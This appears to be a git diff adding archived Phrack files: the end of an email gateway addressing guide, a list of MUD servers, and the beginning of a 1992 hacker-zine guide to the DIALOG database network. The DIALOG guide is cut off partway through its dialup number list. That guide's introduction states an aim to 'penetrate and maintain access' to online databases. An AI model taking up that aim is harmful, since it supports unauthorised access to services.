+keep this file at a reasonable size, methods that can be generated by
+transitivity (A->B and B->C gives A->B->C) are omitted.  Entries are sorted
+first by source network and then by destination network.  This is what a
+typical entry looks like:
+
+   #F mynet
+   #T yournet
+   #R youraddress
+   #C contact address if any
+   #I send to "youraddress@thegateway"
+ 
+For parsing purposes, entries are separated by at least one blank line, and
+each line of an entry begins with a "#" followed by a letter.  Lines beginning
+with "#" are comments and need not be parsed.  Lines which do not start with a
+"#" at all should be ignored as they are probably mail or news headers.
+
+#F (from) and #T (to) lines specify source and destination networks.  If you're
+sending me information about a new network, please give me a brief description
+of the network so that I can add it to the list below.  The abbreviated network
+names used in #F and #T lines should consist only of the characters a-z, 0-9
+and "-" unless someone can make a very convincing case for their favourite pi
+character.
+
+These are the currently known networks with abbreviated names:
+
+   applelink     AppleLink (Apple Computer, Inc.'s in-house network)
+   bitnet        international academic network
+   bix           Byte Information eXchange: Byte magazine's commercial BBS
+   bmug          Berkeley Macintosh Users Group
+   compuserve    commercial time-sharing service
+   connect       Connect Professional Information Network (commercial)
+   easynet       Easynet (DEC's in-house mail system)
+   envoy         Envoy-100 (Canadian commercial mail service)
+   fax           Facsimile document transmission
+   fidonet       PC-based BBS network
+   geonet        GeoNet Mailbox Systems (commercial)
+   internet      the Internet
+   mci           MCI's commercial electronic mail service
+   mfenet        Magnetic Fusion Energy Network
+   nasamail      NASA internal electronic mail
+   peacenet      non-profit mail service
+   sinet         Schlumberger Information NETwork
+   span          Space Physics Analysis Network (includes HEPnet)
+   sprintmail    Sprint's commercial mail service (formerly Telemail)
+   thenet        Texas Higher Education Network
+
+#R (recipient) gives an example of an address on the destination network, to
+make it clear in subsequent lines what text requires subsitution.
+
+#C (contact) gives an address for inquiries concerning the gateway, expressed
+as an address reachable from the source (#F) network.  Presumably, if you can't
+get the gateway to work at all, then knowing an unreachable address on another
+network will not be of great help.
+
+#I (instructions) lines, of which there may be several, give verbal
+instructions to a user of the source network to let them send mail to a user on
+the destination network.  Text that needs to be typed will appear in double
+quotes, with C-style escapes if necessary.
+
+#F applelink
+#T internet
+#R user@domain
+#I send to "user@domain@internet#"
+#I   domain can be be of the form "site.bitnet", address must be <35
+     characters
+
+#F bitnet
+#T internet
+#R user@domain
+#I Methods for sending mail from Bitnet to the Internet vary depending on
+#I what mail software is running at the Bitnet site in question.  In the
+#I best case, users should simply be able to send mail to "user@domain".
+#I If this doesn't work, try "user%domain@gateway" where "gateway" is a 
+#I regional Bitnet-Internet gateway site.  Finally, if neither of these
+#I works, you may have to try hand-coding an SMTP envelope for your mail.
+#I If you have questions concerning this rather terse note, please try
+#I contacting your local postmaster or system administrator first before
+#I you send me mail -- John Chew <poslfit@gpu.utcs.utoronto.ca>
+
+#F compuserve
+#T fax
+#R +1 415 555 1212
+#I send to "FAX 14155551212" (only to U.S.A.)
+
+#F compuserve
+#T internet
+#R user@domain
+#I send to ">INTERNET:user@domain"
+
+#F compuserve
+#T mci
+#R 123-4567
+#I send to ">MCIMAIL:123-4567"
+
+#F connect
+#T internet
+#R user@domain
+#I send to CONNECT id "DASNET"
+#I first line of message: "\"user@domain\"@DASNET"
+
+#F easynet
+#T bitnet
+#R user@site
+#C DECWRL::ADMIN
+#I from VMS use NMAIL to send to "nm%DECWRL::\"user@site.bitnet\""
+#I from Ultrix
+#I   send to "user@site.bitnet" or if that fails
+#I     (via IP) send to "\"user%site.bitnet\"@decwrl.dec.com"
+#I     (via DECNET) send to "DECWRL::\"user@site.bitnet\""
+
+#F easynet
+#T fidonet
+#R john smith at 1:2/3.4
+#C DECWRL::ADMIN
+#I from VMS use NMAIL to send to 
+#I   "nm%DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""
+#I from Ultrix
+#I   send to "john.smith@p4.f3.n2.z1.fidonet.org" or if that fails
+#I     (via IP) send to
+\"john.smith%p4.f3.n2.z1.fidonet.org\"@decwrl.dec.com"
+#I     (via DECNET) send to "DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""
+
+#F easynet
+#T internet
+#R user@domain
+#C DECWRL::ADMIN
+#I from VMS use NMAIL to send to "nm%DECWRL::\"user@domain\""
+#I from Ultrix
+#I   send to "user@domain" or if that fails
+#I     (via IP) send to "\"user%domain\"@decwrl.dec.com"
+#I     (via DECNET) send to "DECWRL::\"user@domain\""
+
+#F envoy
+#T internet
+#R user@domain
+#C ICS.TEST or ICS.BOARD
+#I send to "[RFC-822=\"user(a)domain\"]INTERNET/TELEMAIL/US
+#I for special characters, use @=(a), !=(b), _=(u), any=(three octal digits)
+
+#F fidonet
+#T internet
+#R user@domain
+#I send to "uucp" at nearest gateway site
+#I first line of message: "To: user@domain"
+
+#F geonet
+#T internet
+#R user@domain
+#I send to "DASNET"
+#I subject line: "user@domain!subject"
+
+#F internet
+#T applelink
+#R user
+#I send to "user@applelink.apple.com"
+
+#F internet
+#T bitnet
+#R user@site
+#I send to "user%site.bitnet@gateway" where "gateway" is a gateway host that
+#I   is on both the internet and bitnet.  Some examples of gateways are:
+#I   cunyvm.cuny.edu mitvma.mit.edu.  Check first to see what local policies
+#I   are concerning inter-network forwarding.
+
+#F internet
+#T bix
+#R user
+#I send to "user@dcibix.das.net"
+
+#F internet
+#T bmug
+#R John Smith
+#I send to "John.Smith@bmug.fidonet.org"
+
+#F internet
+#T compuserve
+#R 71234,567
+#I send to "71234.567@compuserve.com"
+#I   note: Compuserve account IDs are pairs of octal numbers.  Ordinary
+#I     consumer CIS user IDs begin with a `7' as shown.
+
+#F internet
+#T connect
+#R NAME
+#I send to "NAME@dcjcon.das.net"
+
+#F internet
+#T easynet
+#R HOST::USER
+#C admin@decwrl.dec.com
+#I send to "user@host.enet.dec.com" or "user%host.enet@decwrl.dec.com"
+
+#F internet
+#T easynet
+#R John Smith @ABC
+#C admin@decwrl.dec.com
+#I send to "John.Smith@ABC.MTS.DEC.COM"
+#I (This syntax is for All-In-1 users.)
+
+#F internet
+#T envoy
+#R John Smith (ID=userid)
+#C /C=CA/ADMD=TELECOM.CANADA/ID=ICS.TEST/S=TEST_GROUP/@nasamail.nasa.gov
+#C   for second method only
+#I send to "uunet.uu.net!att!attmail!mhs!envoy!userid"
+#I   or to "/C=CA/ADMD=TELECOM.CANADA/DD.ID=userid/PN=John_Smith/@Sprint.COM"
+
+#F internet
+#T fidonet
+#R john smith at 1:2/3.4
+#I send to "john.smith@p4.f3.n2.z1.fidonet.org" 
+
+#F internet
+#T geonet
+#R user at host
+#I send to "user:host@map.das.net"
+#I American host is geo4, European host is geo1.
+
+#F internet
+#T mci
+#R John Smith (123-4567)
+#I send to "1234567@mcimail.com"
+#I or send to "JSMITH@mcimail.com" if "JSMITH" is unique
+#I or send to "John_Smith@mcimail.com" if "John Smith" is unique - note the
+#I    underscore!
+#I or send to "John_Smith/1234567@mcimail.com" if "John Smith" is NOT unique
+
+#F internet
+#T mfenet
+#R user@mfenode
+#I send to "user%mfenode.mfenet@nmfecc.arpa"
+
+#F internet
+#T nasamail
+#R user
+#C <postmaster@ames.arc.nasa.gov>
+#I send to "user@nasamail.nasa.gov"
+
+#F internet
+#T peacenet
+#R user
+#C <support%cdp@arisia.xerox.com>
+#I send to "user%cdp@arisia.xerox.com"
+
+#F internet
+#T sinet
+#R node::user or node1::node::user
+#I send to "user@node.SINet.SLB.COM" or "user%node@node1.SINet.SLB.COM"
+
+#F internet
+#T span
+#R user@host
+#C <NETMGR@nssdca.gsfc.nasa.gov>
+#I send to "user@host.span.NASA.gov"
+#I   or to "user%host.span@ames.arc.nasa.gov"
+
+#F internet
+#T sprintmail
+#R [userid "John Smith"/organization]system/country
+#I send to
+/C=country/ADMD=system/O=organization/PN=John_Smith/DD.ID=userid/@Sprint.COM"
+
+#F internet
+#T thenet
+#R user@host
+#I send to "user%host.decnet@utadnx.cc.utexas.edu"
+
+#F mci
+#T internet
+#R John Smith <user@domain>
+#I at the "To:" prompt type "John Smith (EMS)"
+#I at the "EMS:" prompt type "internet"
+#I at the "Mbx:" prompt type "user@domain"
+
+#F nasamail
+#T internet
+#R user@domain
+#I at the "To:" prompt type "POSTMAN"
+#I at the "Subject:" prompt enter the subject of your message
+#I at the "Text:" prompt, i.e. as the first line of your message,
+#I    enter "To: user@domain"
+
+#F sinet
+#T internet
+#R user@domain
+#I send to "M_MAILNOW::M_INTERNET::\"user@domain\""
+#I      or "M_MAILNOW::M_INTERNET::domain::user"
+
+#F span
+#T internet
+#R user@domain
+#C NETMGR@NSSDCA
+#I send to "AMES::\"user@domain\""
+
+#F sprintmail
+#T internet
+#R user@domain
+#I send to "[RFC-822=user(a)domain @GATEWAY]INTERNET/TELEMAIL/US"
+
+#F thenet
+#T internet
+#R user@domain
+#I send to UTADNX::WINS%" user@domain "
+
+_______________________________________________________________________________
+
+ MUDs
+ ~~~~
+ By Frosty of CyberSpace Project
+
+------------------------------------------------------------------------------
+                 MUDWHO servers (5)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Amber            amber.ecst.csuchico.edu  132.241.1.43    6889  up           1
+DEC              decuac.dec.com           192.5.214.1     6889  up           5
+Littlewood       littlewood.math.okstate. 139.78.1.13     6889  up           4
+                  edu
+Nova             nova.tat.physik.         134.2.62.161    6889  up           3
+                  uni-tuebingen.de
+PernWHO          milo.mit.edu             18.70.0.216     6889  up           2
+------------------------------------------------------------------------------
+                 AberMUDs (11)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Aber5@FSU        loligo.cc.fsu.edu        128.186.2.99    5000  R*
+DIRT             ulrik.uio.no             129.240.2.4     6715  up          32
+Dragon           messua.informatik.       137.226.224.9   6715  up
+                  rwth-aachen.de
+Eddie aber       eddie.ee.vt.edu          128.173.5.207   5000  TO
+  Alles
+EnchantedMud     neptune.calstatela.edu   130.182.193.1   6715  up          22
+Longhorn         lisboa.cs.utexas.edu     128.83.139.10   6715  up
+Mustang MUD      mustang.dell.com         143.166.224.42  6715  up
+SpudMud          stjoe.cs.uidaho.edu      129.101.128.7   6715  up
+Temple           bigboy.cis.temple.edu    129.32.32.98    6715  up
+The Underground  hal.gnu.ai.mit.edu       128.52.46.11    6715  R*
+Wolf             b.cs.wvu.wvnet.edu       129.71.11.2     6715  R*
+------------------------------------------------------------------------------
+                 DikuMUDs (17)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Albanian         judy.indstate.edu        139.102.14.10   4000  R
+  DikuMUD
+AlexMUD          alex.stacken.kth.se      130.237.237.3   4000  up
+*Alfa Diku       alfa.me.chalmers.se      129.16.50.11    4000  up
+Austin MUD       austin.daimi.aau.dk      130.225.16.161  4000  R           29
+Caltech DIKU     eltanin.caltech.edu      131.215.139.53  4000  R
+Copper Diku      copper.denver.colorado.  132.194.10.1    4000  up          33
+                  edu
+Davis Diku       fajita.ucdavis.edu       128.120.61.203  3000  up          28
+DikuMUD I        bigboy.cis.temple.edu    129.32.32.98    4000  up
+Elof DikuMUD     elof.iit.edu             192.41.245.90   4000  up
+Epic             hal.gnu.ai.mit.edu       128.52.46.11    9000  R
+Grimne Diku      flipper.pvv.unit.no      129.241.36.200  4000  R
+HypeNet          ????                     129.10.12.2     4000  TO
+Matsci1 Diku     matsci1.uncwil.edu       128.109.221.21  4000  up
+Mudde            hawk.svl.cdc.com         129.179.4.49    4000  up
+  Pathetique
+Sejnet Diku      sejnet.sunet.se          192.36.125.3    4000  up
+Waterdeep        shine.princeton.edu      128.112.120.28  4000  up
+Wayne Diku       venus.eng.wayne.edu      141.217.24.4    4000  R
+------------------------------------------------------------------------------
+                 DUMs (2)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+CanDUM II        cheetah.vlsi.waterloo.   129.97.128.253  2001  up
+                  edu
+DUM II           legolas.cs.umu.se        130.239.88.5    2001  R           23
+------------------------------------------------------------------------------
+                 LPmuds (58)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Aegolius         vyonous.kennesaw.edu     130.218.13.19   2000  up
+  Acadicus
+After Hours      janice.cc.wwu.edu        140.160.240.28  2000  up          30
+Akropolis        ????                     139.124.40.4    6666  up
+Allinite         ????                     134.126.21.223  2222  up
+BatMUD           palikka.jyu.fi           130.234.0.3     2001  up
+*CyberWorld      newview.etsu.edu         192.43.199.33   3000  up          34
+*Darkemud        dunix.drake.edu          192.84.11.2     4040  up          26
+Darker Realms    worf.tamu.edu            128.194.51.189  2000  up
+Dartmouth LPMud  lusty.tamu.edu           128.194.10.118  2000  up
+Deeper Trouble   alk.iesd.auc.dk          130.225.48.46   4242  up
+DevMUD           huey.cc.utexas.edu       128.83.135.2    9300  R
+DiscWorld II     peregrin.resmel.bhp.com. 134.18.1.12     2000  up
+                  au
+Dragon's Den     ????                     129.25.7.111    2222  up
+End Of The Line  mud.stanford.edu         36.21.0.47      2010  up          35
+Finnegan's Wake  maxheadroom.agps.lanl.   192.12.184.10   2112  up
+                  gov
+Frontier         blish.cc.umanitoba.ca    130.179.168.77  9165  up
+GateWay          secum.cs.dal.ca          129.173.24.31   6969  up
+*Genesis         milou.cd.chalmers.se     129.16.79.12    2000  up          36
+*Igor            epsilon.me.chalmers.se   129.16.50.30    1701  up
+ImperialMUD      aix.rpi.edu              128.113.26.11   2000  up          37
+Ivory Tower      brown-swiss.macc.wisc.   128.104.30.151  2000  R           27
+                  edu
+Kobra            duteca4.et.tudelft.nl    130.161.144.22  8888  up
+LPSwat           aviator.cc.iastate.edu   129.186.140.6   2020  up
+Marches of       chema.ucsd.edu           132.239.68.1    3000  up
+  Antan
+Middle-Earth     oba.dcs.gla.ac.uk        130.209.240.66  3000  up          38
+Muddog Mud       phaedrus.math.ufl.edu    128.227.168.2   2000  up
+Mystic           ohm.gmu.edu              129.174.1.33    4000  up
+NANVAENT         saddle.ccsun.strath.ac.  130.159.208.54  3000  up          24
+                  uk
+Nameless         complex.is               130.208.165.231 2000  up
+Nanny            lysator.liu.se           130.236.254.1   2000  up
+NeXT             ????                     152.13.1.5      2000  up
+Nemesis          dszenger9.informatik.    131.159.8.67    2000  up
+                  tu-muenchen.de
+*Nightfall       nova.tat.physik.         134.2.62.161    4242  up
+                  uni-tuebingen.de
+Nightmare        orlith.bates.edu         134.181.1.12    2666  R
+Nirvana 4        elof.iit.edu             192.41.245.90   3500  up
+Nuage            fifi.univ-lyon1.fr       134.214.100.21  2000  R
+*Overdrive       im1.lcs.mit.edu          18.52.0.151     5195  up
+PaderMUD         athene.uni-paderborn.de  131.234.2.32    4242  up
+PixieMud         elof.iit.edu             192.41.245.90   6969  up
+QUOVADIS         disun29.epfl.ch          128.178.79.77   2345  up
+Realmsmud        hammerhead.cs.indiana.   129.79.251.8    2000  up
+                  edu
+Ringworld        ????                     130.199.96.45   3469  R*          34
+Round Table      engr71.scu.edu           129.210.16.71   2222  up
+Sky Realms       maxheadroom.agps.lanl.   192.12.184.10   2000  R*
+                  gov
+SmileyMud        elof.iit.edu             192.41.245.90   5150  up
+StickMUD         palikka.jyu.fi           130.234.0.3     7680  up
+SvenskMUD        lysator.liu.se           130.236.254.1   2043  up          39
+*The Mud         dogstar.colorado.edu     128.138.248.32  5555  up
+  Institute
+Top Mud          lonestar.utsa.edu        129.115.120.1   2001  up
+Tsunami II       gonzo.cc.wwu.edu         140.160.240.20  2777  R*          20
+TubMUD           morgen.cs.tu-berlin.de   130.149.19.20   7680  up
+Valhalla         wiretap.spies.com        130.43.3.3      2444  up
+Valkyrie Prime   fozzie.cc.wwu.edu        140.160.240.21  2777  up
+VikingMUD        swix.ifi.unit.no         129.241.163.51  2001  up
+Vincent's        aviator.cc.iastate.edu   129.186.140.6   1991  up          31
+  Hollow
+World of Mizar   delial.docs.uu.se        130.238.8.40    9000  R
+------------------------------------------------------------------------------
+                 mage (1)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+SynthMAGE        synth.erc.clarkson.edu   128.153.28.35   4242  TO
+------------------------------------------------------------------------------
+                 MOOs (1)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Lambda MOO       lambda.parc.xerox.com    13.2.116.36     8888  up
+------------------------------------------------------------------------------
+                 TinyMUCKs (12)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+AfterFive        pa.itd.com               128.160.2.249   9999  up          31
+Burning Metal    amber.ecst.csuchico.edu  132.241.1.43    8088  up
+Crossroads       coyote.cs.wmich.edu      141.218.40.40   5823  R*
+FurryMUCK        highlandpark.rest.ri.cmu 128.2.254.5     2323  up           8
+                  edu
+High Seas        opus.calstatela.edu      130.182.111.1   4301  up
+Lawries MUD      cserve.cs.adfa.oz.au     131.236.20.1    4201  R            7
+PythonMUCK       zeus.calpoly.edu         129.65.16.21    4201  up          18
+QWest            glia.biostr.washington.  128.95.10.115   9999  up
+                  edu
+Quartz Paradise  quartz.rutgers.edu       128.6.60.6      9999  up          40
+Time Traveller   betz.biostr.washington.  128.95.10.119   4096  up
+                  edu
+TinyMUD Classic  winner.itd.com           128.160.2.248   2000  R           41
+  II
+Visions          l_cae05.icaen.uiowa.edu  128.255.21.25   2001  R           16
+------------------------------------------------------------------------------
+                 MUGs (1)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+UglyMUG          ????                     130.88.14.17    4201  up
+------------------------------------------------------------------------------
+                 TinyMUSEs (5)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Fantasia         betz.biostr.washington.  128.95.10.119   4201  up          13
+                  edu
+FantasyMuse      case2.cs.usu.edu         129.123.7.19    1701  up          42
+MicroMUSE        chezmoto.ai.mit.edu      18.43.0.102     4201  up           6
+Rhostshyl        stealth.cit.cornell.edu  128.253.180.15  4201  up          42
+TrekMUSE         ecsgate.uncecs.edu       128.109.201.1   1701  R           42
+------------------------------------------------------------------------------
+                 TinyMUSHes (15)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+Dungeon          ra.info.sunyit.edu       149.15.1.3      8888  up
+Global MUSH      workstation5.colby.edu   137.146.64.237  4201  up
+ImageCastle      wizard.etsu.edu          192.43.199.19   4201  up
+Narnia           nimitz.mit.edu           18.80.0.161     2555  R*
+PernMUSH         milo.mit.edu             18.70.0.216     4201  up          42
+SouthCon         utpapa.ph.utexas.edu     128.83.131.52   4201  up          42
+Spellbound       thumper.cc.utexas.edu    128.83.135.23   4201  up
+SqueaMUSH        ultimo.socs.uts.edu.au   138.25.8.7      6699  R**
+StingMUSH        newview.etsu.edu         192.43.199.33   1701  up          42
+TinyCWRU         caisr2.caisr.cwru.edu    129.22.24.22    4201  R*
+TinyHORNS        louie.cc.utexas.edu      128.83.135.4    4201  up
+TinyTIM II       cheetah.ece.clarkson.    128.153.13.54   5440  up
+                  edu
+VisionMUSH       tramp.cc.utexas.edu      128.83.135.26   4567  TO
+------------------------------------------------------------------------------
+                 TeenyMUDs (3)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+ApexMUD          apex.yorku.ca            130.63.7.6      4201  up
+Evil!MUD         fido.econ.arizona.edu    128.196.196.1   4201  up
+MetroMUT         uokmax.ecn.uoknor.edu    129.15.20.2     5000  R
+------------------------------------------------------------------------------
+                 TinyMUDs (2)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+DragonMUD        ghost.cse.nau.edu        134.114.64.6    4201  up          14
+TinyWORLD        rillonia.ssc.gov         143.202.16.13   6250  up
+------------------------------------------------------------------------------
+                 UnterMUDs (9)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+ChrisMUD         hawkwind.utcs.utoronto.  128.100.102.51  6600  up          10
+                  ca
+DECmud           decuac.dec.com           192.5.214.1     6565  up          15
+DreamScape       moebius.math.okstate.    139.78.10.3     6250  up          11
+                  edu
+Islandia         hawkwind.utcs.utoronto.  128.100.102.51  2323  up
+                  ca
+RealWorld        cook.brunel.ac.uk        134.83.128.246  4201  up          17
+Sludge           unix1.cc.ysu.edu         192.55.234.50   6565  up          19
+Sunmark          moebius.math.okstate.    139.78.10.3     6543  up
+                  edu
+WanderLand       sun.ca                   192.75.19.1     6666  up           9
+WireHED          amber.ecst.csuchico.edu  132.241.1.43    6565  up          12
+------------------------------------------------------------------------------
+                 YAMUDs (1)
+Name             Address                  Numeric Address Port  Status   Notes
+------------------------------------------------------------------------------
+GooLand          toby.cis.uoguelph.ca     131.104.48.112  6715  up
+------------------------------------------------------------------------------
+Notes
+------------------------------------------------------------------------------
+Asterisk (*) before the name indicates that this sites entry was modified in
+the last 7 days.
+
+Status field:
+*  = last successful connection was more than 7 days ago
+** = last successful connection was more than 30 days ago
+#  = no successful connection on record
+R  = connection refused
+TO = connection timed out
+HD = host down or unreachable
+ND = network down or unreachable
+NA = insufficient address information available
+
+  1. administrator is warlock@ecst.csuchico.edu
+  2. administrator is jt1o@andrew.cmu.edu
+  3. administrator is gamesmgr@taurus.tat.physik.uni-tuebingen.de
+  4. administrator is jds@math.okstate.edu
+  5. administrator is mjr@decuac.dec.com
+  6. send mail to micromuse-registration@michael.ai.mit.edu to register
+  7. send mail to Lawrie.Brown@adfa.oz.au to register
+  8. send mail to ss7m@andrew.cmu.edu to register
+  9. send mail to wanderland@lilith.ebay.sun.com to register
+ 10. send mail to cks@hawkwind.utcs.toronto.edu to register
+ 11. send mail to jds@math.okstate.edu to register
+ 12. send mail to warlock@ecst.csuchico.edu to register
+ 13. send mail to fantasia@betz.biostr.washington.edu to register
+ 14. send mail to {jjt,jopsy}@naucse.cse.nau.edu to register
+ 15. send mail to mjr@decuac.dec.com to register
+ 16. send mail to schlake@minos.nmt.edu to register
+ 17. send mail to ee89psw@brunel.ac.uk to register
+ 18. send mail to {awozniak,claudius}@zeus.calpoly.edu to register
+ 19. send mail to mud@cc.ysu.edu to register
+ 20. hours are 0000-1600(M) 0100-1700(TWRF) 0100-2400(S) 0000-2400(U) GMT
+ 21. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
+ 22. hours are 1900-0600(MTWRF) 0000-2400(SU) PDT
+ 23. hours are 1900-0700(MTWRF) 0000-2400(SU)
+ 24. hours are 1700-0900(MTWRF) 0000-2400(SU) GMT
+ 25. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
+ 26. hours are 2100-0900(MTWRF) 0000-2400(SU)
+ 27. hours are 1630-0800(MTWRF) 0000-2400(SU) CST
+ 28. hours are 2000-0800(MTWRF) 0000-2400(S) 0000-1200,1700-2400(U) PST
+ 29. hours are 1800-0800(MTWRF) 0000-2400(SU) CET
+ 30. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
+ 31. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
+ 32. hours are 2000-0800(MTWRF) 0000-2400(SU) CET
+ 33. hours are 1700-0800(MTWRF) 0000-2400(SU) MST
+ 34. down until further notice
+ 35. closed for repairs
+ 36. the original LP; closed to public
+ 37. closed to public
+ 38. closed to players
+ 39. Swedish-language mud
+ 40. no pennies
+ 41. mail agri@pa.itd.com to recover old characters
+ 42. restricted theme
+_______________________________________________________________________________
diff --git a/phrack39/5.txt b/phrack39/5.txt
new file mode 100644
index 0000000..426e1cf
--- /dev/null
+++ b/phrack39/5.txt
@@ -0,0 +1,1156 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 5 of 13
+
+  ***************************************************************************
+  *                                                                         *
+  *                          The Complete Guide To                          *
+  *                      The DIALOG Information Network                     *
+  *                                                                         *
+  *                                    by                                   *
+  *                              Brian Oblivion                             *
+  *                                                                         *
+  * Courtesy of:       Restricted-Data-Transmissions (RDT)                  *
+  *                  "Truth Is Cheap, But Information Costs."               *
+  *                                                                         *
+  *                                                                 5/9/92  *
+  ***************************************************************************
+
+INTRODUCTION:
+
+     With the plethora of on-line databases in the public and private sectors,
+I feel it is becoming increasingly important to penetrate and maintain access
+to these databases.  The databases in question contain data pertaining to our
+personal lives and to our environment, not to mention the tetrabytes of useful
+information that can be directed toward research and personal education.
+
+
+     Who or What is DIALOG?
+
+     The DIALOG Information Network is a service that links various public and
+commercial databases together for convenience.  In the past, when one wanted to
+access LEGAL RESOURCE INDEX, for instance, one would have to dial direct.  With
+DIALOG, hundreds of databases are connected via X.25 networks (Tymnet,
+Sprintnet, Uninet, Dialnet) eliminating frustrating searching and outrageous
+long distance telephone bills (before the AT&T divestiture).
+
+     Further, within this file is a PARTIAL list of databases found on-line.
+Some of the databases are nothing more than periodicals and abstract sources,
+while others provide FullText articles and books.  There are over 2500
+periodicals, newspapers, newsletters and newswires on-line in FullText.
+
+Here are a few of my favorites:
+
+McGraw-Hill Publications On-Line (File624)
+
+     - Services offer FullText of their Newsletters serving the world-wide
+aerospace and defense industry.  Complete text from 30 newsletters such as
+AeroSpace Daily, BYTE, Aviation Week and Space Technology, Data Communications,
+ENR, among others.  For more info on the database, when in DIALOG type Help
+News624.
+
+PR NEWSWIRE (File613)
+
+     - PR Newswire records contain the complete text of news releases prepared
+by:  companies; public relations agencies; trade associations; city, state,
+federal and non-US Government agencies; and other sources covering the entire
+spectrum of news.  The complete text of a news release typically contains
+details or background information that is not published in newspapers.  More
+than 8500 companies contribute news for PR Newswire.  PR NEWSWIRE is a known
+agent of Corporate Intelligence.
+
+DMS/FI MARKET INTELLIGENCE REPORTS (File589)
+
+     - FullText of World AeroSpace Weekly, covers all aspects of both civil and
+       military aerospace activities worldwide.
+     - World Weapons Review, very high degree of technical detail and
+       perspective.  As such, it has special appeal to military professionals
+       and users of weapons.
+
+Note:  The database treats the newsletters as separate Binders.  For example,
+       to access the World Weapons Review, after connecting to the database,
+       type:
+
+              SELECT BN=WORLD WEAPONS REVIEW
+              or whichever newsletter you wish to search.
+
+FINE CHEMICALS DATABASE (File360)
+
+     - The focus of this database is on sources for laboratory, specialty, and
+unusual chemicals used in scientific research and new product development.
+Fine chemicals are relatively pure chemicals typically produced in small
+quantities.  The database will provide you with manufacturers and/or
+distributors.
+
+DUN'S ELECTRONIC YELLOW PAGES (File515)
+
+     - Largest database of U.S. businesses available on DIALOG, providing
+information on a total of 8.5 million establishments.  Corporate intelligence:
+you can quickly verify the existence of a business.  Then you can obtain
+address, telephone number, employee size, Standard Industrial Classification
+(SIC) and other basic information.
+
+CURRENT CONTENTS SEARCH (File440)
+
+     - FullText articles from over 8000+ worldwide journals dealing with
+science and technology.
+
+BOOKS IN PRINT (File470)
+
+     - Access to in-print and out-of-print books since 1979, BIP lets you
+retrieve bibliographic data on virtually every book published or distributed in
+the United States.  Plus FullText reviews on the book(s) you have selected.
+See next.
+
+PUBLISHERS DISTRIBUTORS AND WHOLESALERS ON-LINE (File450)
+
+     - PDW on-line will locate virtually any book, audio cassette, software
+publisher, distributor, or wholesaler in the U.S.
+
+     You now should have an idea of the power and scope of the Dialog
+Information Network.
+
+NOTE:  Most of DIALOG's Services are now available to certain Research
+       facilities, public and private, on CD-ROM.  Check your local public and
+       university libraries for this service.  Of course, MANY of the more
+       interesting databases are not available on CD-ROM and must still be
+       accessed through the DIALOG network.
+
+
+                           Access to DIALOG Services
+
+     The following on-line services are available from DIALOG Information
+Services:
+
+              DIALOG
+              DIALOG Business (DBC)
+              DIALOG Medical Connection (DMC)
+              DIALMAIL
+              KNOWLEDGE INDEX
+
+     The logon procedures for the first four are identical and use the same
+service address; procedures for KNOWLEDGE INDEX differ only in the use of the
+KI service address, as illustrated throughout this file.
+
+     The most common method of access to DIALOG services uses local phone
+numbers for three telecommunication networks: DIALOG's DIALNET, BT Tymnet,
+TYMNET, and SprintNet.  For those who live in an area that lacks a local dialup
+for those three networks, you may use the 800 link into the DIALNET for access
+to all DIALOG services except KNOWLEDGE INDEX.  This access is not free, but it
+may cost less than dialing long-distance to reach a network node if you live in
+a region without local access.  Access is also available through gateways from
+other on-line systems.
+
+     Access to many DIALOG services is available from countries throughout the
+world and may be accessed from their own Public Data Networks.
+
+Dialnet 800-Number Access
+
+The two DIALNET 800 numbers are available for connecting to Dialog services
+from anywhere in the 48 contiguous states.  Access through these numbers is not
+free.
+
+     (800)DIALNET     300, 1200, and 2400 b. (w/MNP error checking)
+     (800)342-5638
+
+     (800)847-1620    VADIC 3400 series modems (1200 baud)
+                      BELL 103 modems (300 baud)
+                      BELL 212 modems (1200 baud)
+
+Note:  I have excluded all the dialup numbers for Tymnet and Sprintnet.  If you
+       don't know how to find those, obtain a file on X.25 nets and I'm sure
+       they will be listed somewhere in them.
+
+
+                          DIALNET U.S. DIALUP NUMBERS
+
+     (All DIALNET dialup numbers support 300, 1200, and 2400 baud)
+
+     ARIZONA
+     Phoenix....................................(602)257-8895
+
+     CALIFORNIA
+     Alhambra...................................(818)300-9000
+     Longbeach..................................(213)491-0803
+     Los Angeles................................(818)300-9000
+     Marina Del Rey.............................(213)305-9833
+     Newport Beach..............................(714)756-1969
+     Oakland....................................(415)633-7900
+     Palo Alto..................................(415)858-2461
+     Palo Alto..................................(415)858-2461
+     Palo Alto....................................(415)858-2575
+     Sacramento.................................(916)444-5030
+     San Diego..................................(619)297-8610
+     San Francisco..............................(415)957-5910
+     San Jose...................................(408)432-0590
+
+     COLORADO
+     Denver.....................................(303)860-9800
+
+     CONNECTICUT
+     Bloomfield/Hartford........................(203)242-5954
+     Stamford...................................(203)324-1201
+
+     DELAWARE
+     Wilmington.................................(302)652-1706
+
+     DISTRICT OF COLUMBIA
+     Washington.................................(703)359-2500
+
+     GEORGIA
+     Atlanta....................................(404)455-4221
+
+     ILLINOIS
+     Chicago....................................(312)341-1444
+
+     INDIANA
+     Indianapolis...............................(317)635-7259
+
+     MARYLAND
+     Baltimore..................................(301)234-0940
+
+     MASSACHUSETTS
